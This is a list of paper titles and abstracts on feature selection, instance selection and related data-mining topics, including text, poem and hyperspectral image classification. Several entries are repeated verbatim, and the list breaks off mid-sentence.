Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. 
In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2 704 156 subsets. --- paper_title: Toward Optimal Feature Selection paper_content: In this paper, we examine a method for feature subset selection based on Information Theory. Initially, a framework for defining the theoretically optimal, but computationally intractable, method for feature subset selection is presented. We show that our goal should be to eliminate a feature if it gives us little or no additional information beyond that subsumed by the remaining features. In particular, this will be the case for both irrelevant and redundant features. We then give an efficient algorithm for feature selection which computes an approximation to the optimal feature selection criterion. The conditions under which the approximate algorithm is successful are examined. Empirical results are given on a number of data sets, showing that the algorithm effectively handles datasets with a very large number of features. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. 
A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Correlation-based Feature Selection for Machine Learning paper_content: A central problem in machine learning is identifying a representative set of features from which to construct a classification model for a particular task. This thesis addresses the problem of feature selection for machine learning through a correlation based approach. The central hypothesis is that good feature sets contain features that are highly correlated with the class, yet uncorrelated with each other. A feature evaluation formula, based on ideas from test theory, provides an operational definition of this hypothesis. CFS (Correlation based Feature Selection) is an algorithm that couples this evaluation formula with an appropriate correlation measure and a heuristic search strategy. CFS was evaluated by experiments on artificial and natural datasets. Three machine learning algorithms were used: C4.5 (a decision tree learner), IB1 (an instance based learner), and naive Bayes. Experiments on artificial datasets showed that CFS quickly identifies and screens irrelevant, redundant, and noisy features, and identifies relevant features as long as their relevance does not strongly depend on other features. On natural domains, CFS typically eliminated well over half the features. In most cases, classification accuracy using the reduced feature set equaled or bettered accuracy using the complete feature set. Feature selection degraded machine learning performance in cases where some features were eliminated which were highly predictive of very small areas of the instance space. Further experiments compared CFS with a wrapper—a well known approach to feature selection that employs the target learning algorithm to evaluate feature sets. In many cases CFS gave comparable results to the wrapper, and in general, outperformed the wrapper on small datasets. CFS executes many times faster than the wrapper, which allows it to scale to larger datasets. Two methods of extending CFS to handle feature interaction are presented and experimentally evaluated. The first considers pairs of features and the second incorporates iii feature weights calculated by the RELIEF algorithm. Experiments on artificial domains showed that both methods were able to identify interacting features. On natural domains, the pairwise method gave more reliable results than using weights provided by RELIEF. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. 
FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: Correlation-based Feature Selection for Discrete and Numeric Class Machine Learning paper_content: Algorithms for feature selection fall into two broad categories: wrappers that use the learning algorithm itself to evaluate the usefulness of features and filters that evaluate features according to heuristics based on general characteristics of the data. For application to large databases, filters have proven to be more practical than wrappers because they are much faster. However, most existing filter algorithms only work with discrete classification problems. This paper describes a fast, correlation-based filter algorithm that can be applied to continuous and discrete problems. The algorithm often outperforms the well-known ReliefF attribute estimator when used as a preprocessing step for naive Bayes, instance-based learning, decision trees, locally weighted regression, and model trees. It performs more feature selection than ReliefF does—reducing the data dimensionality by fifty percent in most cases. Also, decision and model trees built from the preprocessed data are often significantly smaller. --- paper_title: Feature Selection for Knowledge Discovery and Data Mining paper_content: From the Publisher: ::: With advanced computer technologies and their omnipresent usage, data accumulates in a speed unmatchable by the human's capacity to process data. To meet this growing challenge, the research community of knowledge discovery from databases emerged. The key issue studied by this community is, in layman's terms, to make advantageous use of large stores of data. In order to make raw data useful, it is necessary to represent, process, and extract knowledge for various applications. Feature Selection for Knowledge Discovery and Data Mining offers an overview of the methods developed since the 1970's and provides a general framework in order to examine these methods and categorize them. This book employs simple examples to show the essence of representative feature selection methods and compares them using data sets with combinations of intrinsic properties according to the objective of feature selection. In addition, the book suggests guidelines for how to use different methods under various circumstances and points out new challenges in this exciting area of research. 
Feature Selection for Knowledge Discovery and Data Mining is intended to be used by researchers in machine learning, data mining, knowledge discovery, and databases as a toolbox of relevant tools that help in solving large real-world problems. This book is also intended to serve as a reference book or secondary text for courses on machine learning, data mining, and databases. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Movie Popularity Classification based on Inherent Movie Attributes using C4.5,PART and Correlation Coefficient paper_content: Abundance of movie data across the internet makes it an obvious candidate for machine learning and knowledge discovery. But most researches are directed towards bi-polar classification of movie or generation of a movie recommendation system based on reviews given by viewers on various internet sites. Classification of movie popularity based solely on attributes of a movie i.e. actor, actress, director rating, language, country and budget etc. has been less highlighted due to large number of attributes that are associated with each movie and their differences in dimensions. In this paper, we propose classification scheme of pre-release movie popularity based on inherent attributes using C4.5 and PART classifier algorithm and define the relation between attributes of post release movies using correlation coefficient. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. 
FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: Learning Boolean Concepts in the Presence of Many Irrelevant Features paper_content: Abstract In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias in Boolean domains. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires ⊖(( ln ( l δ ) + [2 p + p ln n])/e) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. For implementing the MIN-FEATURES bias, the paper presents five algorithms that identify a subset of features sufficient to construct a hypothesis consistent with the training examples. FOCUS-1 is a straightforward algorithm that returns a minimal and sufficient subset of features in quasi-polynomial time. FOCUS-2 does the same task as FOCUS-1 but is empirically shown to be substantially faster than FOCUS-1. Finally, the Simple-Greedy, Mutual-Information-Greedy and Weighted-Greedy algorithms are three greedy heuristics that trade optimality for computational efficiency. Experimental studies are presented that compare these exact and approximate algorithms to two well-known algorithms, ID3 and FRINGE, in learning situations where many irrelevant features are present. These experiments show that—contrary to expectations—the ID3 and FRINGE algorithms do not implement good approximations of MIN-FEATURES. The sample complexity and generalization performance of the FOCUS algorithms is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. These experiments also show that, among our three heuristics, the Weighted-Greedy algorithm provides an excellent approximation to the FOCUS algorithms. --- paper_title: The feature selection problem: traditional methods and a new algorithm paper_content: For real-world concept learning problems, feature selection is important to speed up learning and to improve concept quality. We review and analyze past approaches to feature selection and note their strengths and weaknesses. We then introduce and theoretically examine a new algorithm Rellef which selects relevant features using a statistical method. Relief does not depend on heuristics, is accurate even if features interact, and is noise-tolerant. It requires only linear time in the number of given features and the number of training instances, regardless of the target concept complexity. 
The algorithm also has certain limitations such as nonoptimal feature set size. Ways to overcome the limitations are suggested. We also report the test results of comparison between Relief and other feature selection algorithms. The empirical results support the theoretical analysis, suggesting a practical approach to feature selection for real-world problems. --- paper_title: Learning With Many Irrelevant Features paper_content: In many domains, an appropriate inductive bias is the MIN-FEATURES bias, which prefers consistent hypotheses definable over as few features as possible. This paper defines and studies this bias. First, it is shown that any learning algorithm implementing the MIN-FEATURES bias requires Θ((1/ε) ln(1/δ) + (1/ε)[2^p + p ln n]) training examples to guarantee PAC-learning a concept having p relevant features out of n available features. This bound is only logarithmic in the number of irrelevant features. The paper also presents a quasi-polynomial time algorithm, FOCUS, which implements MIN-FEATURES. Experimental studies are presented that compare FOCUS to the ID3 and FRINGE algorithms. These experiments show that--contrary to expectations--these algorithms do not implement good approximations of MIN-FEATURES. The coverage, sample complexity, and generalization performance of FOCUS is substantially better than either ID3 or FRINGE on learning problems where the MIN-FEATURES bias is appropriate. This suggests that, in practical applications, training data should be preprocessed to remove irrelevant features before being given to ID3 or FRINGE. --- paper_title: A Monotonic Measure for Optimal Feature Selection paper_content: Feature selection is a problem of choosing a subset of relevant features. In general, only exhaustive search can bring about the optimal subset. With a monotonic measure, exhaustive search can be avoided without sacrificing optimality. Unfortunately, most error- or distance-based measures are not monotonic. A new measure is employed in this work that is monotonic and fast to compute. The search for relevant features according to this measure is guaranteed to be complete but not exhaustive. Experiments are conducted for verification. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet.
Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: Feature Selection for Classification paper_content: Feature selection has been the focus of interest for quite some time and much work has been done. With the creation of huge databases and the consequent requirements for good machine learning techniques, new problems arise and novel approaches to feature selection are in demand. This survey is a comprehensive overview of many existing methods from the 1970's to the present. It identifies four steps of a typical feature selection method, and categorizes the different existing methods in terms of generation procedures and evaluation functions, and reveals hitherto unattempted combinations of generation procedures and evaluation functions. Representative methods are chosen from each category for detailed explanation and discussion via example. Benchmark datasets with different characteristics are used for comparative study. The strengths and weaknesses of different methods are explained. Guidelines for applying feature selection methods are given based on data types and domain characteristics. This survey identifies the future research areas in feature selection, introduces newcomers to this field, and paves the way for practitioners who search for suitable methods for solving domain-specific real-world applications. --- paper_title: Feature selection algorithms: a survey and experimental evaluation paper_content: In view of the substantial number of existing feature selection algorithms, the need arises to count on criteria that enables to adequately decide which algorithm to use in certain situations. This work assesses the performance of several fundamental algorithms found in the literature in a controlled scenario. A scoring measure ranks the algorithms by taking into account the amount of relevance, irrelevance and redundance on sample data sets. This measure computes the degree of matching between the output given by the algorithm and the known optimal solution. Sample size effects are also studied. --- paper_title: Multi-view Ensemble Learning for Poem Data Classification Using SentiWordNet paper_content: Poem is a piece of writing in which the expression of feeling and ideas is given intensity by particular attention to diction, rhythm and imagery [1]. In this modern age, the poem collection is ever increasing on the internet. Therefore, to classify poem correctly is an important task. Sentiment information of the poem is useful to enhance the classification task. SentiWordNet is an opinion lexicon. To each term are assigned two numeric scores indicating positive and negative sentiment information. Multiple views of the poem data may be utilized for learning to enhance the classification task. In this research, the effect of sentiment information has been explored for poem data classification using Multi-view ensemble learning. The experiments include the use of Support Vector Machine (SVM) for learning classifier corresponding to each view of the data. 
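The Relief abstract above describes a statistical, linear-time relevance weighting scheme but does not spell out its update rule, and the poem-classification study relies on a similar filter-style ranking (Information Gain Ratio). As a rough illustration only, the following is a minimal sketch of a Relief-style weight update for binary-class data with numeric features scaled to [0, 1] and at least two instances per class; the function name relief_weights and the NumPy-based details are illustrative choices, not taken from the cited papers.

```python
import numpy as np

def relief_weights(X, y, n_iter=100, rng=None):
    """Minimal Relief sketch: penalize features that differ from the nearest
    same-class instance (hit), reward features that differ from the nearest
    other-class instance (miss)."""
    X = np.asarray(X, dtype=float)
    y = np.asarray(y)
    rng = np.random.default_rng(rng)
    n_samples, n_features = X.shape
    w = np.zeros(n_features)
    for _ in range(n_iter):
        i = rng.integers(n_samples)
        xi, yi = X[i], y[i]
        d = np.abs(X - xi).sum(axis=1)   # Manhattan distance to every instance
        d[i] = np.inf                    # never pick the sampled instance itself
        same = (y == yi)
        same[i] = False
        hit = np.argmin(np.where(same, d, np.inf))    # nearest same-class instance
        miss = np.argmin(np.where(~same, d, np.inf))  # nearest other-class instance
        w -= np.abs(xi - X[hit]) / n_iter
        w += np.abs(xi - X[miss]) / n_iter
    return w

# Usage: rank features by weight and keep only the top-ranked ones,
# the same kind of filter ordering the studies above apply before training.
# order = np.argsort(relief_weights(X, y))[::-1]
```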
--- paper_title: Stability of feature selection algorithms: a study on high-dimensional spaces paper_content: With the proliferation of extremely high-dimensional data, feature selection algorithms have become indispensable components of the learning process. Strangely, despite extensive work on the stability of learning algorithms, the stability of feature selection algorithms has been relatively neglected. This study is an attempt to fill that gap by quantifying the sensitivity of feature selection algorithms to variations in the training set. We assess the stability of feature selection algorithms based on the stability of the feature preferences that they express in the form of weights-scores, ranks, or a selected feature subset. We examine a number of measures to quantify the stability of feature preferences and propose an empirical way to estimate them. We perform a series of experiments with several feature selection algorithms on a set of proteomics datasets. The experiments allow us to explore the merits of each stability measure and create stability profiles of the feature selection algorithms. Finally, we show how stability profiles can support the choice of a feature selection algorithm. --- paper_title: An effective feature selection method for hyperspectral image classification based on genetic algorithm and support vector machine paper_content: With the development and popularization of the remote-sensing imaging technology, there are more and more applications of hyperspectral image classification tasks, such as target detection and land cover investigation. It is a very challenging issue of urgent importance to select a minimal and effective subset from those mass of bands. This paper proposed a hybrid feature selection strategy based on genetic algorithm and support vector machine (GA-SVM), which formed a wrapper to search for the best combination of bands with higher classification accuracy. In addition, band grouping based on conditional mutual information between adjacent bands was utilized to counter for the high correlation between the bands and further reduced the computational cost of the genetic algorithm. During the post-processing phase, the branch and bound algorithm was employed to filter out those irrelevant band groups. Experimental results on two benchmark data sets have shown that the proposed approach is very competitive and effective. --- paper_title: Self-adaptive differential evolution for feature selection in hyperspectral image data paper_content: Hyperspectral images are captured from hundreds of narrow and contiguous bands from the visible to infrared regions of electromagnetic spectrum. Each pixel of an image is represented by a vector where the components of the vector constitute the reflectance value of the surface for each of the bands. The length of the vector is equal to the number of bands. Due to the presence of large number of bands, classification of hyperspectral images becomes computation intensive. Moreover, higher correlation among neighboring bands increases the redundancy among them. As a result, feature selection becomes very essential for reducing the dimensionality. In the proposed work, an attempt has been made to develop a supervised feature selection technique guided by evolutionary algorithms. Self-adaptive differential evolution (SADE) is used for feature subset generation. Generated subsets are evaluated using a wrapper model where fuzzy k-nearest neighbor classifier is taken into consideration. 
Our proposed method also uses a feature ranking technique, ReliefF algorithm, for removing duplicate features. To demonstrate the effectiveness of the proposed method, investigation is carried out on three sets of data and the results are compared with four other evolutionary based state-of-the-art feature selection techniques. The proposed method shows promising results compared to others in terms of overall classification accuracy and Kappa coefficient. --- paper_title: Band-Subset-Based Clustering and Fusion for Hyperspectral Imagery Classification paper_content: This paper proposes a band-subset-based clustering and fusion technique to improve the classification performance in hyperspectral imagery. The proposed method can account for the varying data qualities and discrimination capabilities across spectral bands, and utilize the spectral and spatial information simultaneously. First, the hyperspectral data cube is partitioned into several nearly uncorrelated subsets, and an eigenvalue-based approach is proposed to evaluate the confidence of each subset. Then, a nonparametric technique is used to extract the arbitrarily-shaped clusters in spatial-spectral domain. Each cluster offers a reference spectral, based on which a pseudosupervised hyperspectral classification scheme is developed by using evidence theory to fuse the information provided by each subset. The experimental results on real Hyperspectral Digital Imagery Collection Experiment (HYDICE) demonstrate that the proposed pseudosupervised classification scheme can achieve higher accuracy than the spatially constrained fuzzy c-means clustering method. It can achieve nearly the same accuracy as the supervised K-Nearest Neighbor (KNN) classifier but is more robust to noise. --- paper_title: Nonparametric weighted feature extraction for classification paper_content: In this paper, a new nonparametric feature extraction method is proposed for high-dimensional multiclass pattern recognition problems. It is based on a nonparametric extension of scatter matrices. There are at least two advantages to using the proposed nonparametric scatter matrices. First, they are generally of full rank. This provides the ability to specify the number of extracted features desired and to reduce the effect of the singularity problem. This is in contrast to parametric discriminant analysis, which usually only can extract L-1 (number of classes minus one) features. In a real situation, this may not be enough. Second, the nonparametric nature of scatter matrices reduces the effects of outliers and works well even for nonnormal datasets. The new method provides greater weight to samples near the expected decision boundary. This tends to provide for increased classification accuracy. --- paper_title: A Branch and Bound Algorithm for Feature Subset Selection paper_content: A feature subset selection algorithm based on branch and bound techniques is developed to select the best subset of m features from an n-feature set. Existing procedures for feature subset selection, such as sequential selection and dynamic programming, do not guarantee optimality of the selected feature subset. Exhaustive search, on the other hand, is generally computationally unfeasible. The present algorithm is very efficient and it selects the best subset without exhaustive search. Computational aspects of the algorithm are discussed. Results of several experiments demonstrate the very substantial computational savings realized. 
For example, the best 12-feature set from a 24-feature set was selected with the computational effort of evaluating only 6000 subsets. Exhaustive search would require the evaluation of 2,704,156 subsets. --- paper_title: Adaptive Intrusion Detection: A Data Mining Approach paper_content: In this paper we describe a data mining framework for constructing intrusion detection models. The first key idea is to mine system audit data for consistent and useful patterns of program and user behavior. The other is to use the set of relevant system features presented in the patterns to compute inductively learned classifiers that can recognize anomalies and known intrusions. In order for the classifiers to be effective intrusion detection models, we need to have sufficient audit data for training and also select a set of predictive system features. We propose to use the association rules and frequent episodes computed from audit data as the basis for guiding the audit data gathering and feature selection processes. We modify these two basic algorithms to use axis attribute(s) and reference attribute(s) as forms of item constraints to compute only the relevant patterns. In addition, we use an iterative level-wise approximate mining procedure to uncover the low frequency but important patterns. We use meta-learning as a mechanism to make intrusion detection models more effective and adaptive. We report our extensive experiments in using our framework on real-world audit data. --- paper_title: A Comparative Study of Feature Selection and Classification Methods for Gene Expression Data of Glioma paper_content: Microarray gene expression data gained great importance in recent years due to its role in disease diagnoses and prognoses, which help to choose the appropriate treatment plan for patients. This technology has ushered in a new era in molecular classification. Interpreting gene expression data remains a difficult problem and an active research area due to its native nature of “high dimensional low sample size”. Such problems pose great challenges to existing classification methods. Thus, effective feature selection techniques are often needed in this case to aid in correctly classifying different tumor types and consequently lead to a better understanding of genetic signatures as well as improved treatment strategies. This paper aims at a comparative study of state-of-the-art feature selection methods, classification methods, and combinations of them, based on gene expression data. We compared the efficiency of three different classification methods including support vector machines, k-nearest neighbor and random forest, and eight different feature selection methods, including information gain, twoing rule, sum minority, max minority, gini index, sum of variances, t-statistics, and one-dimension support vector machine. Five-fold cross validation was used to evaluate the classification performance. Two publicly available gene expression data sets of glioma were used in the experiments. Results revealed the important role of feature selection in classifying gene expression data. By performing feature selection, the classification accuracy can be significantly boosted by using a small number of genes. The relationship of features selected in different feature selection methods is investigated and the most frequent features selected in each fold among all methods for both datasets are evaluated.
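The branch-and-bound abstract above reports finding the best 12 of 24 features while evaluating only about 6000 subsets, against the 2,704,156 subsets an exhaustive search would examine. The sketch below is a simplified illustration of that idea under the assumption of a monotonic criterion (deleting a feature never increases the score), so a branch can be pruned as soon as its score falls to or below the best complete subset found so far; the score function and the recursion structure are illustrative, not the authors' exact algorithm.

```python
from math import comb

print(comb(24, 12))  # 2704156 candidate subsets for exhaustive 12-of-24 search

def branch_and_bound(features, k, score):
    """Find the best k-subset of `features` by deleting features one at a
    time, pruning branches whose (monotonic) score cannot beat the best
    complete solution found so far."""
    best = {"subset": None, "value": float("-inf")}

    def recurse(subset, start):
        if score(subset) <= best["value"]:
            return                                  # prune: no descendant can do better
        if len(subset) == k:
            best["subset"], best["value"] = subset, score(subset)
            return
        # Delete candidate features with non-decreasing index to visit
        # each k-subset exactly once.
        for i in range(start, len(subset)):
            recurse(subset[:i] + subset[i + 1:], i)

    recurse(tuple(features), 0)
    return best["subset"]
```

Because a monotonic measure, such as the one proposed in the monotonic-measure abstract earlier, only decreases along each deletion path, this pruning cannot discard the optimal subset, which is why the search stays complete without being exhaustive.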
--- paper_title: Image retrieval: Current techniques, promising directions and open issues paper_content: This paper provides a comprehensive survey of the technical achievements in the research area of image retrieval, especially content-based image retrieval, an area that has been so active and prosperous in the past few years. The survey includes 100+ papers covering the research aspects of image feature representation and extraction, multidimensional indexing, and system design, three of the fundamental bases of content-based image retrieval. Furthermore, based on the state-of-the-art technology available now and the demand from real-world applications, open research issues are identified and future promising research directions are suggested. --- paper_title: Adaptive forward-backward greedy algorithm for learning sparse representations paper_content: Consider linear prediction models where the target function is a sparse linear combination of a set of basis functions. We are interested in the problem of identifying those basis functions with non-zero coefficients and reconstructing the target function from noisy observations. Two heuristics that are widely used in practice are forward and backward greedy algorithms. First, we show that neither idea is adequate. Second, we propose a novel combination that is based on the forward greedy algorithm but takes backward steps adaptively whenever beneficial. We prove strong theoretical results showing that this procedure is effective in learning sparse representations. Experimental results support our theory. --- paper_title: Poem Classification Using Machine Learning Approach paper_content: The collection of poems is ever increasing on the Internet. Therefore, classification of poems is an important task along with their labels. The work in this paper is aimed to find the best classification algorithms among the K-nearest neighbor (KNN), Naive Bayesian (NB) and Support Vector Machine (SVM) with reduced features. Information Gain Ratio is used for feature selection. The results show that SVM has maximum accuracy (93.25 %) using 20 % top ranked features. --- paper_title: An extensive empirical study of feature selection metrics for text classification paper_content: Machine learning for text classification is the cornerstone of document categorization, news filtering, document routing, and personalization. In text domains, effective feature selection is essential to make the learning task efficient and more accurate. This paper presents an empirical comparison of twelve feature selection methods (e.g. Information Gain) evaluated on a benchmark of 229 text classification problem instances that were gathered from Reuters, TREC, OHSUMED, etc. The results are analyzed from multiple goal perspectives-accuracy, F-measure, precision, and recall-since each is appropriate in different situations. The results reveal that a new feature selection metric we call 'Bi-Normal Separation' (BNS), outperformed the others by a substantial margin in most situations. This margin widened in tasks with high class skew, which is rampant in text classification problems and is particularly challenging for induction algorithms. A new evaluation methodology is offered that focuses on the needs of the data mining practitioner faced with a single dataset who seeks to choose one (or a pair of) metrics that are most likely to yield the best performance. 
From this perspective, BNS was the top single choice for all goals except precision, for which Information Gain yielded the best result most often. This analysis also revealed, for example, that Information Gain and Chi-Squared have correlated failures, and so they work poorly together. When choosing optimal pairs of metrics for each of the four performance goals, BNS is consistently a member of the pair---e.g., for greatest recall, the pair BNS + F1-measure yielded the best performance on the greatest number of tasks by a considerable margin. --- paper_title: Toward integrating feature selection algorithms for classification and clustering paper_content: This paper introduces concepts and algorithms of feature selection, surveys existing feature selection algorithms for classification and clustering, groups and compares different algorithms with a categorizing framework based on search strategies, evaluation criteria, and data mining tasks, reveals unattempted combinations, and provides guidelines in selecting feature selection algorithms. With the categorizing framework, we continue our efforts toward-building an integrated system for intelligent feature selection. A unifying platform is proposed as an intermediate step. An illustrative example is presented to show how existing feature selection algorithms can be integrated into a meta algorithm that can take advantage of individual algorithms. An added advantage of doing so is to help a user employ a suitable algorithm without knowing details of each algorithm. Some real-world applications are included to demonstrate the use of feature selection in data mining. We conclude this work by identifying trends and challenges of feature selection research and development. --- paper_title: Feature Selection for High-Dimensional Data: A Fast Correlation-Based Filter Solution paper_content: Feature selection, as a preprocessing step to machine learning, is effective in reducing dimensionality, removing irrelevant data, increasing learning accuracy, and improving result comprehensibility. However, the recent increase of dimensionality of data poses a severe challenge to many existing feature selection methods with respect to efficiency and effectiveness. In this work, we introduce a novel concept, predominant correlation, and propose a fast filter method which can identify relevant features as well as redundancy among relevant features without pairwise correlation analysis. The efficiency and effectiveness of our method is demonstrated through extensive comparisons with other methods using real-world data of high dimensionality --- paper_title: Multi-view Ensemble Learning for Poem Data Classification Using SentiWordNet paper_content: Poem is a piece of writing in which the expression of feeling and ideas is given intensity by particular attention to diction, rhythm and imagery [1]. In this modern age, the poem collection is ever increasing on the internet. Therefore, to classify poem correctly is an important task. Sentiment information of the poem is useful to enhance the classification task. SentiWordNet is an opinion lexicon. To each term are assigned two numeric scores indicating positive and negative sentiment information. Multiple views of the poem data may be utilized for learning to enhance the classification task. In this research, the effect of sentiment information has been explored for poem data classification using Multi-view ensemble learning. 
The experiments include the use of Support Vector Machine (SVM) for learning classifier corresponding to each view of the data. --- paper_title: A Unifying View on Instance Selection paper_content: In this paper, we consider instance selection as an important focusing task in the data preparation phase of knowledge discovery and data mining. Focusing generally covers all issues related to data reduction. First of all, we define a broader perspective on focusing tasks, choose instance selection as one particular focusing task, and outline the specification of concrete evaluation criteria to measure success of instance selection approaches. Thereafter, we present a unifying framework that covers existing approaches towards solutions for instance selection as instantiations. We describe specific examples of instantiations of this framework and discuss their strengths and weaknesses. Then, we outline an enhanced framework for instance selection, generic sampling, and summarize example evaluation results for several different instantiations of its implementation. Finally, we conclude with open issues and research challenges for instance selection as well as focusing in general. --- paper_title: Advances in Instance Selection for Instance-Based Learning Algorithms paper_content: The basic nearest neighbour classifier suffers from the indiscriminate storage of all presented training instances. With a large database of instances classification response time can be slow. When noisy instances are present classification accuracy can suffer. Drawing on the large body of relevant work carried out in the past 30 years, we review the principle approaches to solving these problems. By deleting instances, both problems can be alleviated, but the criterion used is typically assumed to be all encompassing and effective over many domains. We argue against this position and introduce an algorithm that rivals the most successful existing algorithm. When evaluated on 30 different problems, neither algorithm consistently outperforms the other: consistency is very hard. To achieve the best results, we need to develop mechanisms that provide insights into the structure of class definitions. We discuss the possibility of these mechanisms and propose some initial measures that could be useful for the data miner. --- paper_title: Subspace clustering for high dimensional data: a review paper_content: Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces within a dataset. Often in high dimensional data, many dimensions are irrelevant and can mask existing clusters in noisy data. Feature selection removes irrelevant and redundant dimensions by analyzing the entire dataset. Subspace clustering 